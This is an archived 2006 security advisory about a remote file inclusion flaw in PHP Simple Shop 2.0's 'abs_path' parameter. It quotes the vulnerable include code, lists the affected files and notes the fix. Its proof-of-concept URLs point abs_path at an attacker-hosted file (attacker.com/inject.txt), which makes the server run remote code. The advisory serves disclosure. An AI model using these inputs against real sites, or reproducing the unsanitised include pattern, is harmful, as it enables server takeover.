Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: b06-4062.htm

PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion



PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion
PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion



ECHO_ADV_44$2006=0D
=0D
------------------------------------------------------------------------------=0D
[ECHO_ADV_44$2006] PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion=0D
------------------------------------------------------------------------------=0D
=0D
Author		: Ahmad Maulana a.k.a Matdhule=0D
Date Found	: August, 07th 2006=0D
Location	: Indonesia, Jakarta=0D
web		: http://advisories.echo.or.id/adv/adv44-matdhule-2006.txt=0D 
Critical Lvl	: Highly critical=0D
Impact		: System access=0D
Where		: From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
PHP Simple Shop=0D
=0D
Application	: PHP Simple Shop=0D
version		: Latest version [2.0]=0D
URL		: http://www.turnkeywebtools.com/phpsimpleshop=0D 
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~=0D
=0D
In folder admin we found vulnerability script index.php=0D
---------------------------index.php---------------------------------------=0D
....=0D
http://www.turnkeywebtools.com/phpsimpleshop/=0D 
  =0D
  Copyright (c) 2001-2005 Turnkey Web Tools, Inc.=0D
*/=0D
=0D
if (isset($abs_path) && $abs_path != "") {=0D
    include $abs_path."admin/adminglobal.php";=0D
} else {=0D
    include "./adminglobal.php";=0D
} =0D
...=0D
----------------------------------------------------------=0D
=0D
Input passed to the "abs_path" parameter in index.php is not=0D
properly verified before being used. This can be exploited to execute=0D
arbitrary PHP code by including files from local or external=0D
resources.=0D
=0D
Also affected files :=0D
=0D
adminindex.php=0D
adminglobal.php=0D
login.php=0D
menu.php=0D
header.php=0D
=0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~=0D
=0D
http://target.com/[phpsimpleshop_path]/admin/index.php?abs_path=http://attacker.com/inject.txt?=0D 
http://target.com/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://attacker.com/inject.txt?=0D 
http://target.com/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://attacker.com/inject.txt?=0D 
http://target.com/[phpsimpleshop_path]/admin/login.php?abs_path=http://attacker.com/inject.txt?=0D 
http://target.com/[phpsimpleshop_path]/admin/menu.php?abs_path=http://attacker.com/inject.txt?=0D 
http://target.com/[phpsimpleshop_path]/admin/header.php?abs_path=http://attacker.com/inject.txt?=0D 
=0D
Solution:=0D
~~~~~~~=0D
- Sanitize variable $abs_path on affected files.=0D
=0D
Notification:=0D
~~~~~~~~~~=0D
=0D
I've been contacting the web/software administrator to tell about this hole in his system, =0D
but instead of giving  a nice response, he replied so rudely and arrogantly. =0D
I recommend not to use this product for your own sake.=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~=0D
~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson    :)   =0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D 
~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net=0D 
------------------------------------------------------------------------=0D
---=0D
Contact:=0D
~~~~=0D
 =0D
     matdhule[at]gmail[dot]com=0D
     =0D
-------------------------------- [ EOF ]----------------------------------=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH